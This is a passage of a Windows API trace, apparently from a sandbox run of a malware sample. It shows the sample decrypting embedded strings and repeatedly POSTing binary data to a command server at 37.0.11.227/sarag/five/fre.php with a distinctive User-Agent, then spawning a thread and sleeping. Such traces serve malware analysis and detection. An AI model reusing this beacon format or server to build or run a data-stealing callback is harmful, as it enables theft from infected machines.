phKey=0x19fcac*=0x69d5e8) returned 1 [0211.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.546] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.547] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.548] GetProcessHeap () returned 0x690000 [0211.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0211.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.549] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0211.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.550] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.551] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0211.551] GetProcessHeap () returned 0x690000 [0211.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.552] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.553] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.554] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.555] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.555] GetProcessHeap () returned 0x690000 [0211.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0211.555] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.555] GetProcessHeap () returned 0x690000 [0211.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0211.556] GetProcessHeap () returned 0x690000 [0211.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.556] GetProcessHeap () returned 0x690000 [0211.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.556] GetProcessHeap () returned 0x690000 [0211.556] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0211.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.562] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0211.568] GetProcessHeap () returned 0x690000 [0211.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0211.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.569] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.570] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.571] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.571] GetProcessHeap () returned 0x690000 [0211.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0211.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.572] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0211.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.573] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.574] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0211.574] GetProcessHeap () returned 0x690000 [0211.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.575] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0211.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.576] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0211.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.577] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0211.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.578] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0211.578] GetProcessHeap () returned 0x690000 [0211.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0211.578] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0211.578] GetProcessHeap () returned 0x690000 [0211.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0211.578] socket (af=2, type=1, protocol=6) returned 0x4e4 [0211.579] connect (s=0x4e4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0211.604] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0211.604] GetProcessHeap () returned 0x690000 [0211.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0211.604] GetProcessHeap () returned 0x690000 [0211.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0211.605] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.605] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.605] GetProcessHeap () returned 0x690000 [0211.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0211.605] GetProcessHeap () returned 0x690000 [0211.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.606] GetProcessHeap () returned 0x690000 [0211.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0211.606] GetProcessHeap () returned 0x690000 [0211.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0211.607] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.607] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.607] GetProcessHeap () returned 0x690000 [0211.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0211.607] GetProcessHeap () returned 0x690000 [0211.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.608] send (s=0x4e4, buf=0x6ad508*, len=242, flags=0) returned 242 [0211.608] send (s=0x4e4, buf=0x6aba40*, len=159, flags=0) returned 159 [0211.609] GetProcessHeap () returned 0x690000 [0211.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0211.609] recv (in: s=0x4e4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0211.697] GetProcessHeap () returned 0x690000 [0211.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0211.698] GetProcessHeap () returned 0x690000 [0211.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.698] GetProcessHeap () returned 0x690000 [0211.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0211.699] GetProcessHeap () returned 0x690000 [0211.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0211.700] closesocket (s=0x4e4) returned 0 [0211.700] GetProcessHeap () returned 0x690000 [0211.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0211.701] GetProcessHeap () returned 0x690000 [0211.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.701] GetProcessHeap () returned 0x690000 [0211.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0211.702] GetProcessHeap () returned 0x690000 [0211.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0211.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x704) returned 0x4e4 [0211.706] Sleep (dwMilliseconds=0xea60) [0211.708] GetProcessHeap () returned 0x690000 [0211.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0211.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.710] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0211.721] GetProcessHeap () returned 0x690000 [0211.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0211.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.722] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.723] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.724] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.724] GetProcessHeap () returned 0x690000 [0211.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0211.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.725] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0211.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.726] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.729] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0211.729] GetProcessHeap () returned 0x690000 [0211.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.730] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.731] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.733] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.733] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.733] GetProcessHeap () returned 0x690000 [0211.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0211.734] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.750] GetProcessHeap () returned 0x690000 [0211.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0211.751] GetProcessHeap () returned 0x690000 [0211.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.751] GetProcessHeap () returned 0x690000 [0211.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.751] GetProcessHeap () returned 0x690000 [0211.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0211.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.757] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0211.763] GetProcessHeap () returned 0x690000 [0211.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0211.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.764] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.765] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.766] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.766] GetProcessHeap () returned 0x690000 [0211.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0211.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.767] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0211.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.768] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.769] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0211.769] GetProcessHeap () returned 0x690000 [0211.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.770] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0211.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.771] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0211.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.772] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0211.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.773] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0211.773] GetProcessHeap () returned 0x690000 [0211.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0211.773] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0211.773] GetProcessHeap () returned 0x690000 [0211.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0211.773] socket (af=2, type=1, protocol=6) returned 0x4e8 [0211.774] connect (s=0x4e8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0211.802] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0211.802] GetProcessHeap () returned 0x690000 [0211.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0211.802] GetProcessHeap () returned 0x690000 [0211.802] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0211.803] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.804] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.804] GetProcessHeap () returned 0x690000 [0211.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0211.804] GetProcessHeap () returned 0x690000 [0211.805] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.805] GetProcessHeap () returned 0x690000 [0211.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0211.805] GetProcessHeap () returned 0x690000 [0211.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0211.805] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.806] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.806] GetProcessHeap () returned 0x690000 [0211.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0211.806] GetProcessHeap () returned 0x690000 [0211.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.806] send (s=0x4e8, buf=0x6ad508*, len=242, flags=0) returned 242 [0211.807] send (s=0x4e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0211.807] GetProcessHeap () returned 0x690000 [0211.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0211.807] recv (in: s=0x4e8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0211.895] GetProcessHeap () returned 0x690000 [0211.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0211.896] GetProcessHeap () returned 0x690000 [0211.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0211.897] GetProcessHeap () returned 0x690000 [0211.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0211.897] GetProcessHeap () returned 0x690000 [0211.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0211.897] closesocket (s=0x4e8) returned 0 [0211.899] GetProcessHeap () returned 0x690000 [0211.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0211.899] GetProcessHeap () returned 0x690000 [0211.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.900] GetProcessHeap () returned 0x690000 [0211.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0211.900] GetProcessHeap () returned 0x690000 [0211.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0211.900] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6ec) returned 0x4e8 [0211.902] Sleep (dwMilliseconds=0xea60) [0211.903] GetProcessHeap () returned 0x690000 [0211.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0211.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.904] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0211.915] GetProcessHeap () returned 0x690000 [0211.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0211.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.916] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.917] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.918] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.918] GetProcessHeap () returned 0x690000 [0211.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0211.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.937] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0211.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.944] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.946] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0211.946] GetProcessHeap () returned 0x690000 [0211.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.947] 